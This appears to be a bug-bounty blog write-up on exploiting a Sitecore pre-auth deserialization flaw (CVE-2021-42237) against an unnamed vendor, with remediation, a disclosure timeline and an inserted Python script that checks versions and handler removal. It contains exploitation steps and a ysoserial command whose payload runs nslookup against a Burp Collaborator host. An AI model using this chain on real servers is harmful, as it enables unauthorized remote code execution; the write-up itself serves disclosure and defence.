How I Got Pre-Auth Remote Code Execution (CVE-2021-42237) on One of the Vendors

Caesar Evan Santoso
4 min read · Jul 6, 2022
SITECORE Pre-Auth Remote Code Execution

Hi!!! In this article I would like to tell you a little about how I accidentally discovered the “Pre-Auth Remote Code Execution (CVE-2021-42237)” attack on one of the vendors affected by it.

Note: I will censor any vendor affected by this attack.

Description

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve Remote Command Execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

(https://nvd.nist.gov/vuln/detail/CVE-2021-42237)

Reconnaissance

First of all, I found the “Sitecore” login page.

And I found out the version used by this Sitecore instance by opening the page “/sitecore/shell/sitecore.version.xml”.

(https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0891209)

Sitecore Version 8.2 (Vuln)

After I got this version of Sitecore, I continued looking for vulnerabilities that impacted version 8.2.

Versions affected
Vulnerability SC2021–003–499266 affects the following Sitecore XP versions:
Sitecore XP 7.5 Initial Release — Sitecore XP 7.5 Update-2
Sitecore XP 8.0 Initial Release — Sitecore XP 8.0 Update-7
Sitecore XP 8.1 Initial Release — Sitecore XP 8.1 Update-3
Sitecore XP 8.2 Initial Release — Sitecore XP 8.2 Update-7

Exploitation

After I identified the vulnerable version and the vulnerability type, I proceeded to try to exploit this vulnerable website.
For more details regarding this attack, see:
(https://blog.assetnote.io/2021/11/02/sitecore-rce/)

1) I opened the page (/sitecore/shell/ClientBin/Reporting/Report.ashx), intercepted the request in Burp Suite, and changed the request method from GET to POST.

2) I also added a simple XML body, which is useful for triggering the RCE.

3) Use “ysoserial” to generate a serialized payload that leads to Remote Code Execution (RCE).

nslookup is a network administration command line tool to query the Domain Name System for mappings between domain names and IP addresses, or other DNS records.

(./ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "nslookup URL.burpcollaborator.net" -o base64 -t)
“NetDataContractSerializer” is inherently vulnerable to command execution.

Base64 Decode

4) After you create the RCE payload using ysoserial, base64-decode it and put it in the “<parameter name=””>” section.

5) When you run this payload, you will get a DNS response on your Burp Collaborator.

Remediation

In order to fix this vulnerability:
For Sitecore XP 8.0.0 — Sitecore XP 8.2.7, remove the Report.ashx file located at /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.

Note: The Report.ashx file is no longer used and can safely be removed.
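To check your own instances against the affected ranges listed above and to verify that the Report.ashx handler is really gone, here is a small Python script I am adding as an example (it is not part of the original write-up or Sitecore's own tooling). It assumes the sitecore.version.xml file carries the version in <major>, <minor> and <build> elements, with <build> holding the Update number; the sample XML is constructed for the test.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Affected ranges exactly as listed in the advisory: (major, minor) -> last affected Update.
AFFECTED = {(7, 5): 2, (8, 0): 7, (8, 1): 3, (8, 2): 7}

# Constructed sample of /sitecore/shell/sitecore.version.xml (assumed layout).
SAMPLE_VERSION_XML = """<?xml version="1.0" encoding="utf-8"?>
<information>
  <version><major>8</major><minor>2</minor><build>5</build><revision>180406</revision></version>
  <title>Sitecore.NET</title>
</information>"""


def parse_version(xml_text):
    """Return (major, minor, update) from sitecore.version.xml; update defaults to 0."""
    root = ET.fromstring(xml_text)
    ver = root.find("version")
    if ver is None:
        raise ValueError("no <version> element in sitecore.version.xml")
    major = int(ver.findtext("major"))
    minor = int(ver.findtext("minor"))
    update = int(ver.findtext("build") or 0)  # assumption: <build> is the Update number
    return major, minor, update


def is_affected(version):
    """True if the version falls inside one of the advisory's affected ranges."""
    major, minor, update = version
    last_bad = AFFECTED.get((major, minor))
    return last_bad is not None and update <= last_bad


def report_ashx_removed(status_code):
    """Remediation check: the deleted handler should no longer be served (404 or 410)."""
    return status_code in (404, 410)


def check_host(base_url):
    """Fetch the version file and GET Report.ashx; returns (affected_version, handler_removed)."""
    with urllib.request.urlopen(base_url + "/sitecore/shell/sitecore.version.xml", timeout=10) as r:
        affected = is_affected(parse_version(r.read().decode("utf-8", "replace")))
    try:
        with urllib.request.urlopen(base_url + "/sitecore/shell/ClientBin/Reporting/Report.ashx", timeout=10) as r:
            status = r.status
    except urllib.error.HTTPError as e:
        status = e.code
    return affected, report_ashx_removed(status)


if __name__ == "__main__":
    print(is_affected(parse_version(SAMPLE_VERSION_XML)))  # sample 8.2 Update-5 -> True
```

Run check_host("https://your-sitecore-host") after deleting the file; an affected version with the handler still answering anything but 404/410 means the remediation has not landed on that instance.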

Timeline

  1. 1 July 2022 > I sent a report to them
  2. 3 July 2022 > They managed to fix this attack by deleting the file “Report.ashx” at (/sitecore/shell/ClientBin/Reporting/Report.ashx)
NICE~


Thankssss All!!!